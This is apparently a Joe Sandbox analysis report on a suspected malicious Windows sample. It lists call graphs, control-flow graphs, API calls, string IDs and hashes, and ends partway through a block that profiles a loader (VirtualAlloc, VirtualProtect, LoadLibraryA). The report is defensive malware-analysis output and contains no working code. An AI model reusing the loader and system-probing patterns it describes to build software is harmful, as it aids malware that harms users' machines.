21345->21346 21347 41463a 21346->21347 21348 41e6a0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 21347->21348 21349 41464c 21348->21349 21350 4098d0 RtlExpandEnvironmentStrings RtlAllocateHeap 21349->21350 21351 414656 21350->21351 21352 4098d0 RtlExpandEnvironmentStrings RtlAllocateHeap 21351->21352 21353 414675 21352->21353 21354 421370 RtlAllocateHeap LdrInitializeThunk 21353->21354 21355 414693 21354->21355 21356 421840 LdrInitializeThunk 21355->21356 21357 41469c 21356->21357 21358 4098d0 RtlExpandEnvironmentStrings RtlAllocateHeap 21357->21358 21359 4146a6 21358->21359 21360 4226d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 21359->21360 21361 4146bb 21360->21361 21362 4098d0 RtlExpandEnvironmentStrings RtlAllocateHeap 21361->21362 21363 4146c5 21362->21363 21364 423c90 RtlAllocateHeap 21363->21364 21365 4146da 21364->21365 21366 42d8f0 6 API calls 21365->21366 21367 4146e3 21366->21367 21369 41de81 21368->21369 21370 41decf RtlExpandEnvironmentStrings 21368->21370 21369->21370 21371 41df14 21370->21371 21372 435aa0 RtlAllocateHeap 21371->21372 21373 41df24 RtlExpandEnvironmentStrings 21372->21373 21374 41dfa2 21373->21374 21375 435aa0 RtlAllocateHeap 21374->21375 21376 41e030 21375->21376 21376->21376 21377 43aba0 2 API calls 21376->21377 21378 41e0a7 21377->21378 21379 41151a 21380 411523 21379->21380 21381 4098d0 2 API calls 21380->21381 21382 41153d 21381->21382 21383 4098d0 2 API calls 21382->21383 21384 411563 21383->21384 21385 437998 21387 4379e7 21385->21387 21386 437a4e 21386->21386 21389 437b1e 21386->21389 21390 435c40 LdrInitializeThunk 21386->21390 21387->21386 21388 435c40 LdrInitializeThunk 21387->21388 21388->21386 21390->21389 21391 415f9d 21392 415fa3 21391->21392 21393 435aa0 RtlAllocateHeap 21392->21393 21394 416077 21393->21394 21394->21394 21395 43a9f0 2 API calls 21394->21395 21396 416101 21395->21396 21401 4252a4 21402 4252b7 21401->21402 21403 433bb0 RtlExpandEnvironmentStrings 21402->21403 21404 42587a 21403->21404 21405 4258c2 GetPhysicallyInstalledSystemMemory 21404->21405 21406 4258e7 21405->21406 21406->21406 21407 416228 21408 435aa0 RtlAllocateHeap 21407->21408 21409 416233 21408->21409 21410 43ae80 LdrInitializeThunk 21409->21410 21411 41624e 21410->21411 21412 4336aa 21413 4336af 21412->21413 21414 435aa0 RtlAllocateHeap 21413->21414 21415 4336bf 21414->21415 21416 43ae80 LdrInitializeThunk 21415->21416 21417 4336e8 21416->21417 21418 4232ab 21419 4232c0 21418->21419 21419->21419 21420 435aa0 RtlAllocateHeap 21419->21420 21421 4233b8 21420->21421 21422 43a9f0 2 API calls 21421->21422 21425 423469 21422->21425 21423 435aa0 RtlAllocateHeap 21423->21425 21424 43a9f0 2 API calls 21424->21425 21425->21423 21425->21424 21425->21425 21430 4140b6 21431 4140c5 21430->21431 21432 4098d0 2 API calls 21431->21432 21433 4140df 21432->21433 21434 4156b6 21435 4156e0 21434->21435 21435->21435 21436 4156eb RtlExpandEnvironmentStrings 21435->21436 21437 41570a 21436->21437 21438 435aa0 RtlAllocateHeap 21437->21438 21439 415719 RtlExpandEnvironmentStrings 21438->21439 21440 415794 21439->21440 21441 435aa0 RtlAllocateHeap 21440->21441 21442 41581a 21441->21442 21442->21442 21443 43a9f0 2 API calls 21442->21443 21448 41589b 21443->21448 21444 415a4b RtlExpandEnvironmentStrings 21444->21448 21445 435aa0 RtlAllocateHeap 21446 415a88 RtlExpandEnvironmentStrings 21445->21446 21446->21448 21447 435aa0 RtlAllocateHeap 21447->21448 21448->21444 21448->21445 21448->21447 21449 43a9f0 2 API calls 21448->21449 21449->21448 21450 42dfb8 21451 42dfbd 21450->21451 21452 42e051 KiUserCallbackDispatcher GetSystemMetrics 21451->21452 21453 42e09b 21452->21453

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 273 4156b6-4156df 274 4156e0-4156e9 273->274 274->274 275 4156eb-415708 RtlExpandEnvironmentStrings 274->275 276 415711 275->276 277 41570a-41570f 275->277 278 415713-415792 call 435aa0 RtlExpandEnvironmentStrings 276->278 277->278 281 4157e3-415806 278->281 282 415794 278->282 284 415808-41580d 281->284 285 41580f-415811 281->285 283 4157a0-4157e1 282->283 283->281 283->283 286 415814-41582a call 435aa0 284->286 285->286 289 415851-41585c 286->289 290 41582c-415831 286->290 291 415883 289->291 292 41585e-415864 289->292 293 415840-41584f 290->293 295 415886-41589e call 43a9f0 291->295 294 415870-41587f 292->294 293->289 293->293 294->294 296 415881 294->296 299 4158d4-415a3f 295->299 296->295 300 415a40-415a49 299->300 300->300 301 415a4b-415a68 RtlExpandEnvironmentStrings 300->301 302 415a80 301->302 303 415a6a-415a6f 301->303 304 415a82-415b01 call 435aa0 RtlExpandEnvironmentStrings 302->304 303->304 307 415b53-415b85 304->307 308 415b03 304->308 310 415b90-415b92 307->310 311 415b87-415b8c 307->311 309 415b10-415b51 308->309 309->307 309->309 312 415b95-415bb0 call 435aa0 310->312 311->312 315 415bd1-415bdc 312->315 316 415bb2-415bb7 312->316 317 4158a0 315->317 318 415be2-415be8 315->318 319 415bc0-415bcf 316->319 321 4158a3-4158b6 call 43a9f0 317->321 320 415bf0-415bff 318->320 319->315 319->319 320->320 322 415c01 320->322 324 4158bb-4158d1 321->324 322->321 324->299
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004156F8
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041572E
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,00000000,?), ref: 00415A58
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,?,?), ref: 00415A9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: VSB
                                                    • API String ID: 237503144-2654250299
                                                    • Opcode ID: 53cef7e92d736fe6a7591e0a6cb12257e52cdfb14691c055fed94390b50e5863
                                                    • Instruction ID: 561acfdcea67f0ed6ea61f084dffec9e4f3ed68c02ddb911ce32c0222a0ae114
                                                    • Opcode Fuzzy Hash: 53cef7e92d736fe6a7591e0a6cb12257e52cdfb14691c055fed94390b50e5863
                                                    • Instruction Fuzzy Hash: 01F17DB5A00B01AFD724DF29C8427A3BBF5FF49324F14461DE8AA8B790E335A4518BD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 630 4046d0-4046f2 call 4086e0 633 4046f8-40473b 630->633 634 404d9f-404da8 630->634 635 404742-40474a call 4086e0 633->635 636 40473d 633->636 638 40474f-404758 635->638 636->635 639 404bc5-404bce call 4086f0 638->639 640 40475e-404773 638->640 639->634 642 404795-40479e 640->642 644 4047d0-4047d8 642->644 645 4047a0-4047a5 642->645 646 404802-40480d 644->646 647 404780-404782 645->647 648 4047a7-4047ab 645->648 649 404786-40478f 646->649 647->649 650 4047b4-4047bc 648->650 649->642 651 404812-404819 649->651 652 4047b0-4047b2 650->652 653 4047be-4047c3 650->653 654 404820-404965 call 408770 * 3 651->654 655 40481b 651->655 652->650 656 4047e0-4047ef call 408700 652->656 653->652 666 4049d0-4049ed call 403020 654->666 667 404967-404970 654->667 655->654 656->647 661 4047f1-4047fd 656->661 661->646 673 404bd3-404bd4 666->673 674 4049f3-404b97 666->674 668 4049a6-4049ca call 403020 667->668 676 404980-4049a4 call 403020 668->676 677 4049cc-4049ce 668->677 675 404cb9-404ccf call 4086f0 * 2 673->675 678 404bf7-404c2f 674->678 679 404b99-404ba2 674->679 675->634 676->666 676->668 677->676 684 404c31 678->684 685 404c9d-404ca3 678->685 680 404bb4-404bbc 679->680 681 404ba4 679->681 689 404bb0-404bb2 680->689 690 404bbe-404bc3 680->690 688 404cae-404cb8 681->688 693 404c40-404c9b 684->693 686 404cd4-404cd6 685->686 687 404ca5-404ca8 685->687 698 404d50-404d9b call 4086f0 686->698 694 404cd8-404cf8 687->694 695 404caa-404cac 687->695 688->675 689->680 696 404bd9-404be5 call 408700 689->696 690->689 693->685 693->693 699 404cfa-404cfd 694->699 695->699 696->688 706 404beb-404bf3 696->706 698->634 699->698 704 404cff-404d03 699->704 707 404d10-404d4e 704->707 706->678 707->698 707->707
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    • Opcode ID: 81389711beaa29f86f5f82e84e63627ab08fe02229620d9f452df9630ba90dcb
                                                    • Instruction ID: 8102909a56e56f31e14bd42bc049a778ecbfeaf59adb2e6de5403f8909f3a5ca
                                                    • Opcode Fuzzy Hash: 81389711beaa29f86f5f82e84e63627ab08fe02229620d9f452df9630ba90dcb
                                                    • Instruction Fuzzy Hash: C012FDB1A083449FD714CF28D85076B7BE1EF85304F05857EEA85AB382D778D909CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: m!s$7q9w$tu
                                                    • API String ID: 0-1328737773
                                                    • Opcode ID: 9a80d6aeca7c9c941bb5b843a82725633c88e976ea84821064f12ec0d42a7703
                                                    • Instruction ID: a0c0b6b935059c8c526aef0dde426ea912ec2d3602511b1274e97aa73ba39016
                                                    • Opcode Fuzzy Hash: 9a80d6aeca7c9c941bb5b843a82725633c88e976ea84821064f12ec0d42a7703
                                                    • Instruction Fuzzy Hash: 1D91F1B16443018BDB14DF14CC927BBB7A1FF91718F19492EE8829B391E378D941C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DF06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID:
                                                    • API String ID: 237503144-0
                                                    • Opcode ID: 97cb1da8bad9422afa365411f7b79ffaf2cd696d95e47ce5748a6747c636db49
                                                    • Instruction ID: 262629fdbb3efc19342746e0a643e000866adf4d73472e6c2c89fe251207d53e
                                                    • Opcode Fuzzy Hash: 97cb1da8bad9422afa365411f7b79ffaf2cd696d95e47ce5748a6747c636db49
                                                    • Instruction Fuzzy Hash: 862278B46083418FE314CF15C89076BB7E6FFCA309F14892DE8959B291D778D945CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 01A4F5EE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 01A4F60E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A4E000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1a4e000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 770e6471237a622dbd974e5901457404b46c220aa14fe3b96d936a2d62b8d365
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: F9F096352007116FE7203BFDA88DB6EB6E8AFC9625F101628E642D10C0DB70E8454A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !$|)t+
                                                    • API String ID: 0-1543151180
                                                    • Opcode ID: c3e86dcb4a145c767efabe64718c64748602917cefe9c5578b12583e16bef2f1
                                                    • Instruction ID: 0549958bf72732722078fd682deb9016a6df138242a2d297af9ac57ce41d61db
                                                    • Opcode Fuzzy Hash: c3e86dcb4a145c767efabe64718c64748602917cefe9c5578b12583e16bef2f1
                                                    • Instruction Fuzzy Hash: D341BB716183109BC718CF14C8A076BB7B0FF8A328F049A1DE8E19B380E378D941C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ec7d6abf085d8bd83f76fa4baf0a946e39f35204c992aad82303006fadc16a0
                                                    • Instruction ID: 58d5ef61e29c700e7a5bf84aeee46845931b96e69ec54e1ba371a830b22f87e7
                                                    • Opcode Fuzzy Hash: 7ec7d6abf085d8bd83f76fa4baf0a946e39f35204c992aad82303006fadc16a0
                                                    • Instruction Fuzzy Hash: F371E0B1604B008FD724CF24D891753BBE2BF49314F198A6ED8AA8B792D778E845CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435C27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 740ebc34b8d8c971d3edc87d0057dfa78f29b7d66a8bae47ee5e3db84938a7f1
                                                    • Instruction ID: 1272006d1290d83cf13eff99d31ed8c686e055d99e4b0088207ea3cb61a97368
                                                    • Opcode Fuzzy Hash: 740ebc34b8d8c971d3edc87d0057dfa78f29b7d66a8bae47ee5e3db84938a7f1
                                                    • Instruction Fuzzy Hash: 141139705083019FD708CF54C46472BFBE1EBC5318F248A5DE8A91B291C379D959CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrInitializeThunk.NTDLL(0043AB86,005C003F,00000006,?,?,00000018,8A858487,?,:RA), ref: 00435C6D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction ID: 57f1bbd75be791b51c1c69d73521a326315edc5ecdbfadca72035e30f952b94d
                                                    • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction Fuzzy Hash: 64E09275508602AFEA05DF45C14050EF7E2BFC8718F55988DE88473604C6B4AD45DA42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54c05f572b40e1ee658a53a265a9c69a1e9a99d1188c26c8d681712ba5683871
                                                    • Instruction ID: 0646c17248e0037d8b2e2a871ccc27ad5747d79b115fced78c7331720078151d
                                                    • Opcode Fuzzy Hash: 54c05f572b40e1ee658a53a265a9c69a1e9a99d1188c26c8d681712ba5683871
                                                    • Instruction Fuzzy Hash: D0D167B8610B018FD324CF25D890B27B7E1FB4A304F958A2DD5968BB61D779F846CB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 18c67bc5bb0a48b41565800ffdfda66d5c88e8ed4c356a8f6cf2c87f11dabd23
                                                    • Instruction ID: b691efaaebe1fd9e0190dd32e1fb97d0ad8f24f092331a3f0970b38f0ebcf96e
                                                    • Opcode Fuzzy Hash: 18c67bc5bb0a48b41565800ffdfda66d5c88e8ed4c356a8f6cf2c87f11dabd23
                                                    • Instruction Fuzzy Hash: 06D1C1B1A083219BD704CF18D89072BB7E1EFE5754F98496EE4858B391E739DD04CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f0fae915c2973b017a55c8055e8b591edaf4bb58aca64972c5d659872db0369
                                                    • Instruction ID: 024c6bc1a7c06842b7b2da60ebc75b4e81c0e709c88b8f194da14b798eec8cba
                                                    • Opcode Fuzzy Hash: 3f0fae915c2973b017a55c8055e8b591edaf4bb58aca64972c5d659872db0369
                                                    • Instruction Fuzzy Hash: 13C145B4214B01CFD324CF25D894B27B7E1FB8A304F958A2DD5968BAA1D778F446CB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3afab0ab5a78844f1761c8edcd1a07d0367c9c2f88b7ef853da9937646c6a3ad
                                                    • Instruction ID: cfd6409ae6c1319e473ca82dbec1d2571da19b56d0cb4a7f1dcbce60b372dc38
                                                    • Opcode Fuzzy Hash: 3afab0ab5a78844f1761c8edcd1a07d0367c9c2f88b7ef853da9937646c6a3ad
                                                    • Instruction Fuzzy Hash: B781DD72A043019BD714CF18C890B6BB3A1FF88318F19991DE9959B392D334EC15CBDA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44c21440910b441c3c47798c68511679ee4b192c036e3a23ecd466ca5ef6df7e
                                                    • Instruction ID: 7ec337f4810fed5a0fc0c42e7f6c195b542c32b12575270dc2a29337bbab3055
                                                    • Opcode Fuzzy Hash: 44c21440910b441c3c47798c68511679ee4b192c036e3a23ecd466ca5ef6df7e
                                                    • Instruction Fuzzy Hash: 76519BB52483019BE718CF14C890B6FB7F1EB89748F24981DE5E59B391D378E815CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a525d3b901aab37e805287b5fe7f45e91ed26bae2eb08f4b056ac6a42eabfecf
                                                    • Instruction ID: e35f2d1fee80e2f1db852cb22d8b1dde2544e3ec87f29d33cf979d87121eb95b
                                                    • Opcode Fuzzy Hash: a525d3b901aab37e805287b5fe7f45e91ed26bae2eb08f4b056ac6a42eabfecf
                                                    • Instruction Fuzzy Hash: E64148B4210B008BD729CF15C890B27F7F2FF49315F589A1DD4968BA95CB78E4168B89
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ac606fa896dbfc20e0858d286959e527960311e6db785cbe9c751ee3dc681b9
                                                    • Instruction ID: c35e6b3492bc7fc63c5e4d94200a91186c139317177be3ffd343f9b61624e557
                                                    • Opcode Fuzzy Hash: 7ac606fa896dbfc20e0858d286959e527960311e6db785cbe9c751ee3dc681b9
                                                    • Instruction Fuzzy Hash: 4E5156B0244B008FE3348F15C894B17B7F2EB49318F649A1DD4A29BB95C778F9058B88
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13eac76ea8d3fd39f0c83d84732ee0ae87b3b7a133187896b959945c85a3b65a
                                                    • Instruction ID: ca850fd041728cb81bae71f088373bc471964c8ad35e0faae0c370fe9a2fbc17
                                                    • Opcode Fuzzy Hash: 13eac76ea8d3fd39f0c83d84732ee0ae87b3b7a133187896b959945c85a3b65a
                                                    • Instruction Fuzzy Hash: 5831B271A00B018FC725CF35C8817A7B7E2FB89314F188A2ED1AAC3791E778E4818B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a8646d0b6c90f403e1a8a630bed48f489923bff8176b96a56545a554dce1654f
                                                    • Instruction ID: ea6735051b580764b1b091c7d8751f59caf218b0077db567d50405ba04e5f90f
                                                    • Opcode Fuzzy Hash: a8646d0b6c90f403e1a8a630bed48f489923bff8176b96a56545a554dce1654f
                                                    • Instruction Fuzzy Hash: 8CE092397006004BC658AB30D89267B736397C6300F0C143CD447A33A2CE78B8818A49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a8d40ba8103fe54fbe292f7b0286ae1ba72782342e545eadd221858701af8b18
                                                    • Instruction ID: fb33a21c909e12981a6b8ef3dc275bf6d2761d5d6d7fe25341320a66258a9d40
                                                    • Opcode Fuzzy Hash: a8d40ba8103fe54fbe292f7b0286ae1ba72782342e545eadd221858701af8b18
                                                    • Instruction Fuzzy Hash: 1BF0AC745093408FC324DF25C55575ABBF0FB8D304F81892DD59A8B291D778A904CF86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 20 365003c-3650047 21 365004c-3650263 call 3650a3f call 3650e0f call 3650d90 VirtualAlloc 20->21 22 3650049 20->22 37 3650265-3650289 call 3650a69 21->37 38 365028b-3650292 21->38 22->21 43 36502ce-36503c2 VirtualProtect call 3650cce call 3650ce7 37->43 40 36502a1-36502b0 38->40 42 36502b2-36502cc 40->42 40->43 42->40 49 36503d1-36503e0 43->49 50 36503e2-3650437 call 3650ce7 49->50 51 3650439-36504b8 VirtualFree 49->51 50->49 53 36505f4-36505fe 51->53 54 36504be-36504cd 51->54 57 3650604-365060d 53->57 58 365077f-3650789 53->58 56 36504d3-36504dd 54->56 56->53 62 36504e3-3650505 LoadLibraryA 56->62 57->58 63 3650613-3650637 57->63 60 36507a6-36507b0 58->60 61 365078b-36507a3 58->61 64 36507b6-36507cb 60->64 65 365086e-36508be LoadLibraryA 60->65 61->60 66 3650517-3650520 62->66 67 3650507-3650515 62->67 68 365063e-3650648 63->68 69 36507d2-36507d5 64->69 72 36508c7-36508f9 65->72 70 3650526-3650547 66->70 67->70 68->58 71 365064e-365065a 68->71 73 3650824-3650833 69->73 74 36507d7-36507e0 69->74 75 365054d-3650550 70->75 71->58 76 3650660-365066a 71->76 79 3650902-365091d 72->79 80 36508fb-3650901 72->80 78 3650839-365083c 73->78 81 36507e4-3650822 74->81 82 36507e2 74->82 83 3650556-365056b 75->83 84 36505e0-36505ef 75->84 77 365067a-3650689 76->77 87 3650750-365077a 77->87 88 365068f-36506b2 77->88 78->65 89 365083e-3650847 78->89 80->79 81->69 82->73 85 365056d 83->85 86 365056f-365057a 83->86 84->56 85->84 90 365057c-3650599 86->90 91 365059b-36505bb 86->91 87->68 92 36506b4-36506ed 88->92 93 36506ef-36506fc 88->93 94 3650849 89->94 95 365084b-365086c 89->95 103 36505bd-36505db 90->103 91->103 92->93 97 36506fe-3650748 93->97 98 365074b 93->98 94->65 95->78 97->98 98->77 103->75
                                                    APIs
